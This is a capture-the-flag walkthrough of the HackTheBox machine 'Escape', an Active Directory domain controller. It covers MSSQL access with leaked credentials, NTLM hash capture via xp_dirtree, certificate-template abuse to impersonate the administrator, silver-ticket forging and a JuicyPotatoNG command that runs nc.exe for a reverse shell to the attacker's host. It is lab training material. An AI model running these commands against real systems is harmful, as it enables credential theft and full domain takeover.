10 KiB
HackTheBox - Escape
NMAP
Nmap scan report for 10.10.11.202
Host is up (0.26s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-02-26 22:30:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:01+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:00+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-26T03:01:12
| Not valid after: 2053-02-26T03:01:12
| MD5: 21884a6bf954052953ea17d7d48ef578
|_SHA-1: a5c4b21438d9864636d0923db5bc3785598f6364
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:01+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-26T22:32:00+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
|_SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
Adding the FQDN in /etc/hosts file
PORT 139/445 (SMB)
Checking for null authentication of smb we do see some shares
From Public share we see a pdf document
On the first page of the document it talks about accessing SQL Server with a non domain joined machine also it reveals three potential usernames Tom, Brandon and Ryan
On the next page we'll see the credentials
Foothold
We can just try using impacket's mssqclient to login into the database using the provided credentials
mssqlclient.py PublicUser:GuestUserCantWrite1@sequel.htb
Trying to enable xp_cmdshell but it failed
With xp_dirtree we can capture the NTLMv2 hash of the account with which the mssql service is running
xp_dirtree \\10.10.14.70\uwu
With hashcat we can crack the hash with the password REGGIE1234ronnie
With this password we can enumerate to get domain users
However logging with the service account, it failed
Running bloodhound to enumerate the domain
python3 /opt/BloodHound.py/bloodhound.py -d 'sequel.htb' -u 'sql_svc' -p 'REGGIE1234ronnie' -c all -ns 10.10.11.202
From bloodhound we can see this user has CanPsRemote on dc which means we can login through winrm
evil-winrm -i sequel.htb -u 'sql_svc' -p 'REGGIE1234ronnie'
Privilege Escalation (Ryan.Cooper)
Checking C:\SQLServer\Logs\ERRORLOG.BAK, we'll find the password for Ryan.Cooper
Privilege Escalation (Administrator)
After logging using Certify to check vulnerable certificate template, this can be downloaded from here
./Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:administrator
Copy the certificate in a file cert.pem
Convert it to cert.pfx
Transfer it back to the windows machine and also transfer Rubues to get TGT of administrator
Conveting the kirbi ticket to ccache
Running secretsdump.py to dump NTDS
Un-inteded
As sql_svc was not able to login mssql, we can try forging a silver ticket to impersonate as the administrator on mssq, we need the ntlm hash of the sql_svc and the domain sid
import hashlib,binascii
hash = hashlib.new('md4', "REGGIE1234ronnie".encode('utf-16le')).digest();
print (binascii.hexlify(hash));
Through rpcclient , we can get the domain sid
With ticketer.py we can create the silver ticket
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -spn MSSQLSvc/dc.sequel.htb -domain sequel.htb -domain-sid S-1-5-21-4078382237-1492182817-2568127209 administrator
Before running mssqlclient , make sure to synchronize the time zone with ntpdate
mssqlclient.py dc.sequel.htb -k -no-pass
sudo ntpdate dc.sequel.htb
Now we can enable xp_cmdshell and get a reverse shell
Transfer nc.exe and get a reverse shell
If we check running whoami /all, it will show that there's SeImpersonatePrivilege enabled meaning that we can abuse that to get a SYSTEM token and eventually get a system shell
With JuicyPotato-NG, we can get a reverse shell as SYSTEM
JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe 10.10.14.70 80 -e cmd.exe"
